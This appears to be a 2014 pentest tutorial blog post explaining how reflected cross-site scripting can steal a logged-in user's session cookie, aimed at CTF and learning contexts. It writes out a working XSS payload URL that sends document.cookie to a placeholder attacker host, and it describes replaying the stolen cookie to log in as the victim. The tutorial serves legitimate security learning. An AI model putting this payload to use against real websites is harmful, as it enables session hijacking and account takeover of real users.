Sunday, August 3, 2014

Refresher Series - Stealing Cookies with XSS

During Capture the Flag (CTF) events or if you are learning to pentest, sometimes you may be posed with the challenge to login to a website without having credentials.  This type of attack requires a few things generally, a website or part of one that is protected, victim, and cross site scripting.  I have also included vulnerable web server code at the bottom of the post, so you can try it yourself.

  1. The attacker finds a webserver vulnerable to XSS 
  2. The user logs into the webserver
  3. The attacker sends  message with a malicious link designed to send the cookie to the attacker
  4. The link is opened and the user unknowingly sends their cookie to the attacker
  5. The attacker is happy as he logs into the webserver

In the example we use reflected XSS, this could be done with stored also the steps would remain the same with the exception of needing to send the message to the user.
Here are the actual steps taking place:

1. Attacker finds a login page and discovers XSS.



Login Page


User input reflected back to the page
Confirmed XSS

2. A user logs into the site to preform normal business, and given a session id.

Valid user login


3. The attacker sends a malicious link in an email or some other means with this type of link which may vary or need to be encoded. 
http://192.168.1.190/login.html?user=test<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the link is opened it visits the page and shows an invalid user to the victim. However, in the background it sends a request to the attacker’s site with their cookie included.  Where the attacker has just a simple python web server listening. The incoming request shows the cookie: sessionid and the value of "super_secret_session". 

Incoming session information

5. The attacker then uses their preferred method to get the cookie into their browser such as a plugin like web developers toolbar for Firefox and adds the cookie.


The attacker then simply visits the site and is automatically logged in.


Below you will find the code for the vulnerable web server. Only requirement is python.